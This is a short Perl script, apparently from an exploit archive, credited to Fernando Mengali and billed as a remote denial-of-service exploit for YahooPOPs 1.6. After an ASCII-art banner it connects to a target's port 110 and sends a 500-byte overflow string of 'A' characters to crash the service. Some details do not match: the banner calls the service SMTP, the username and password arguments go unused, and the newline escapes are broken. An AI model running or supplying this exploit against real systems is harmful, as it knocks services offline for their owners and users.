Authored by Fernando Mengali

YahooPOPs version 1.6 remote denial of service exploit.

use IO::Socket;

   sub intro {
      print q {

                              ,--,
                       _ ___/ /|
                   ,;'( )__, )  ~
                  //  //   '--; 
                  '        | ^
                       ^    ^

      [+] YahooPOPs 1.6 - SMTP - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: [email protected]

      }
  }

intro();


    if (!$ARGV[0]) {
        print "nUsage: $0 <ip> <username> <password>n";
        exit(0);
}

my $host = $ARGV[0];
my $username = $ARGV[1];
my $password = $ARGV[2];
my $port = 110;
my $payload  = "A" x 500;

my $ip = inet_aton($ARGV[0]);

my $socket = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 10
);

unless ($socket) {
    die "[+] socket() error: $!n";
}

print "[+] YahooPOPS SMTP detected, constructing the payloadn";

unless ($socket->send($payload)) {
    die "[+] Sending error, the server probably rebooted.n";
}

RELATED ARTICLESMORE FROM AUTHOR